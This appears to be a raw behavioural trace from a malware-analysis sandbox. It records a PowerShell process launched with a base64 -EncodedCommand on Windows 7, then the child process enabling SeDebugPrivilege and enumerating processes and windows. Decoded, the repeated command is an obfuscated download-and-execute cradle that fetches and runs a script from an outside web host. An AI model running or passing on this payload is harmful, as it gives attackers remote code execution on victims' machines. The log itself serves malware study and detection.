	[0452.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0452.607] FindNextFileW (in: hFindFile=0x3a9920, lpFindFileData=0x1c8bd8d0 | out: lpFindFileData=0x1c8bd8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0452.607] FindClose (in: hFindFile=0x3a9920 | out: hFindFile=0x3a9920) returned 1
	[0452.607] SetErrorMode (uMode=0x1) returned 0x1
	[0452.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8bd9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0452.608] SetErrorMode (uMode=0x1) returned 0x1
	[0452.608] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8bdbf0 | out: lpFileInformation=0x1c8bdbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0452.608] SetErrorMode (uMode=0x1) returned 0x1
	[0452.609] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0452.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0452.609] CoTaskMemFree (pv=0x2eb0f0) 
	[0452.610] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0452.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0452.610] CoTaskMemFree (pv=0x2eb0f0) 
	[0452.613] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0452.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0452.613] CoTaskMemFree (pv=0x2eb0f0) 
	[0452.621] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0452.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0452.621] CoTaskMemFree (pv=0x2eb0f0) 
	[0452.632] CoTaskMemAlloc (cb=0x3b) returned 0x36dec0
	[0452.633] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8bddd8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8bddd8) returned 0x4550
	[0452.633] CoTaskMemFree (pv=0x36dec0) 
	[0452.636] GetConsoleWindow () returned 0x2010e
	[0452.895] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0452.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0452.895] CoTaskMemFree (pv=0x2eb0f0) 
	[0452.896] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0452.896] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0452.896] CoTaskMemFree (pv=0x2eb0f0) 
	[0452.902] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0452.902] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0452.902] CoTaskMemFree (pv=0x2eb0f0) 
	[0452.904] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c8bde20 | out: pNumArgs=0x1c8bde20) returned 0x1b8025e0*=""
	[0452.905] lstrlenW (lpString="-EncodedCommand") returned 15
	[0452.906] CoTaskMemAlloc (cb=0x22) returned 0x1b7d9bc0
	[0452.906] RtlMoveMemory (in: Destination=0x1b7d9bc0, Source=0x1b802602, Length=0x20 | out: Destination=0x1b7d9bc0) 
	[0452.906] CoTaskMemFree (pv=0x1b7d9bc0) 
	[0452.906] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0452.906] CoTaskMemAlloc (cb=0x2f4) returned 0x1b802920
	[0452.906] RtlMoveMemory (in: Destination=0x1b802920, Source=0x1b802622, Length=0x2f2 | out: Destination=0x1b802920) 
	[0452.906] CoTaskMemFree (pv=0x1b802920) 
	[0452.907] LocalFree (hMem=0x1b8025e0) returned 0x0
	[0452.908] CoTaskMemAlloc (cb=0x804) returned 0x1b8025e0
	[0452.908] GetConsoleTitleW (in: lpConsoleTitle=0x1b8025e0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0452.908] CoTaskMemFree (pv=0x1b8025e0) 
	[0452.917] CoTaskMemAlloc (cb=0x38e) returned 0x1b8025e0
	[0452.917] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c8bdd80*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x350c988 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x350c988*(hProcess=0x334, hThread=0x330, dwProcessId=0x17f4, dwThreadId=0x17f8)) returned 1
	[0453.153] CoTaskMemFree (pv=0x1b8025e0) 
	[0453.154] CloseHandle (hObject=0x330) returned 1
	[0453.155] CoTaskMemAlloc (cb=0x3b) returned 0x36dec0
	[0453.155] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8bde28, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8bde28) returned 0x4550
	[0453.155] CoTaskMemFree (pv=0x36dec0) 
	[0453.161] GetCurrentProcess () returned 0xffffffffffffffff
	[0453.161] GetCurrentProcess () returned 0xffffffffffffffff
	[0453.162] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8bdf08, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8bdf08*=0x330) returned 1

Process:
	id = "40"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1ca49000"
	os_pid = "0xc80"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 224
	os_tid = 0xc84

	[0477.617] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0480.578] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0480.579] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0480.579] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0480.579] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0489.305] GetVersionExW (in: lpVersionInformation=0x24dc40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dc40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0489.308] GetVersionExW (in: lpVersionInformation=0x24dc40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dc40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0489.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0489.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0489.322] GetVersionExW (in: lpVersionInformation=0x24d9b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d9b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0489.323] SetErrorMode (uMode=0x1) returned 0x1
	[0489.324] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24db10 | out: lpFileInformation=0x24db10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0489.325] SetErrorMode (uMode=0x1) returned 0x1
	[0489.331] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dd80 | out: lpdwHandle=0x24dd80) returned 0x94c
	[0489.333] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e872d8 | out: lpData=0x2e872d8) returned 1
	[0489.335] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2e87374, puLen=0x24dcf0) returned 1
	[0489.338] lstrlenW (lpString="䅁") returned 1
	[0490.037] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x2e87450, puLen=0x24dc60) returned 1
	[0490.037] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0490.039] CoTaskMemAlloc (cb=0x2e) returned 0x18b0a0
	[0490.039] lstrcpyW (in: lpString1=0x18b0a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0490.041] CoTaskMemFree (pv=0x18b0a0) 
	[0490.041] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x2e874a4, puLen=0x24dc60) returned 1
	[0490.041] lstrlenW (lpString="System.Management.Automation") returned 28
	[0490.041] CoTaskMemAlloc (cb=0x3c) returned 0x11ec10
	[0490.041] lstrcpyW (in: lpString1=0x11ec10, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0490.041] CoTaskMemFree (pv=0x11ec10) 
	[0490.041] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x2e87500, puLen=0x24dc60) returned 1
	[0490.041] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0490.041] CoTaskMemAlloc (cb=0x20) returned 0x18c1b0
	[0490.041] lstrcpyW (in: lpString1=0x18c1b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0490.041] CoTaskMemFree (pv=0x18c1b0) 
	[0490.041] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x2e87540, puLen=0x24dc60) returned 1
	[0490.041] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0490.041] CoTaskMemAlloc (cb=0x44) returned 0x11ec10
	[0490.041] lstrcpyW (in: lpString1=0x11ec10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0490.041] CoTaskMemFree (pv=0x11ec10) 
	[0490.041] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x2e875a8, puLen=0x24dc60) returned 1
	[0490.041] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0490.041] CoTaskMemAlloc (cb=0x76) returned 0x1331c0
	[0490.041] lstrcpyW (in: lpString1=0x1331c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0490.042] CoTaskMemFree (pv=0x1331c0) 
	[0490.042] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x2e87644, puLen=0x24dc60) returned 1
	[0490.042] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0490.042] CoTaskMemAlloc (cb=0x44) returned 0x11ec10
	[0490.042] lstrcpyW (in: lpString1=0x11ec10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0490.042] CoTaskMemFree (pv=0x11ec10) 
	[0490.042] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x2e876a8, puLen=0x24dc60) returned 1
	[0490.042] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0490.042] CoTaskMemAlloc (cb=0x58) returned 0xeb1e0
	[0490.042] lstrcpyW (in: lpString1=0xeb1e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0490.042] CoTaskMemFree (pv=0xeb1e0) 
	[0490.042] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x2e87724, puLen=0x24dc60) returned 1
	[0490.042] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0490.042] CoTaskMemAlloc (cb=0x20) returned 0x18c1b0
	[0490.042] lstrcpyW (in: lpString1=0x18c1b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0490.042] CoTaskMemFree (pv=0x18c1b0) 
	[0490.042] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x2e873cc, puLen=0x24dc60) returned 1
	[0490.042] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0490.042] CoTaskMemAlloc (cb=0x66) returned 0xfb850
	[0490.043] lstrcpyW (in: lpString1=0xfb850, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0490.043] CoTaskMemFree (pv=0xfb850) 
	[0490.043] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x0, puLen=0x24dc60) returned 0
	[0490.043] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x0, puLen=0x24dc60) returned 0
	[0490.043] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dc68, puLen=0x24dc60 | out: lplpBuffer=0x24dc68*=0x0, puLen=0x24dc60) returned 0
	[0490.043] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dc38, puLen=0x24dc30 | out: lplpBuffer=0x24dc38*=0x2e87374, puLen=0x24dc30) returned 1
	[0490.044] CoTaskMemAlloc (cb=0x204) returned 0x1396d0
	[0490.044] VerLanguageNameW (in: wLang=0x0, szLang=0x1396d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0490.045] CoTaskMemFree (pv=0x1396d0) 
	[0490.045] VerQueryValueW (in: pBlock=0x2e872d8, lpSubBlock="\\", lplpBuffer=0x24dc88, puLen=0x24dc80 | out: lplpBuffer=0x24dc88*=0x2e87300, puLen=0x24dc80) returned 1
	[0490.051] GetCurrentProcessId () returned 0xc80
	[0490.066] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24cbb0 | out: lpLuid=0x24cbb0*(LowPart=0x14, HighPart=0)) returned 1
	[0490.754] GetCurrentProcess () returned 0xffffffffffffffff
	[0490.754] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24cbd0 | out: TokenHandle=0x24cbd0*=0x218) returned 1
	[0490.755] AdjustTokenPrivileges (in: TokenHandle=0x218, DisableAllPrivileges=0, NewState=0x2e8ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0490.757] CloseHandle (hObject=0x218) returned 1
	[0490.760] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc80) returned 0x218
	[0490.774] EnumProcessModules (in: hProcess=0x218, lphModule=0x2e8abb8, cb=0x200, lpcbNeeded=0x24dbe8 | out: lphModule=0x2e8abb8, lpcbNeeded=0x24dbe8) returned 1
	[0490.779] GetModuleInformation (in: hProcess=0x218, hModule=0x13f370000, lpmodinfo=0x2e8ae28, cb=0x18 | out: lpmodinfo=0x2e8ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0490.787] CoTaskMemAlloc (cb=0x804) returned 0x18f1f0
	[0490.787] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x13f370000, lpBaseName=0x18f1f0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0490.787] CoTaskMemFree (pv=0x18f1f0) 
	[0490.788] CoTaskMemAlloc (cb=0x804) returned 0x18f1f0
	[0490.788] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x13f370000, lpFilename=0x18f1f0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0490.788] CoTaskMemFree (pv=0x18f1f0) 
	[0490.789] CloseHandle (hObject=0x218) returned 1
	[0491.631] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc80) returned 0x218
	[0491.632] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x24dd18 | out: lpExitCode=0x24dd18*=0x103) returned 1
	[0491.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e8b088, Length=0x20000, ResultLength=0x24dce0 | out: SystemInformation=0x12e8b088, ResultLength=0x24dce0*=0x2ebf8) returned 0xc0000004
	[0491.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12eab0b8, Length=0x313f8, ResultLength=0x24dce0 | out: SystemInformation=0x12eab0b8, ResultLength=0x24dce0*=0x2ebf8) returned 0x0
	[0491.656] EnumWindows (lpEnumFunc=0x2b566ac, lParam=0x0) returned 1
	[0492.902] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.902] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x558
	[0492.902] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.902] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.902] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.902] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x538
	[0492.902] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.902] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x778
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x778
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
	[0492.903] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4d0
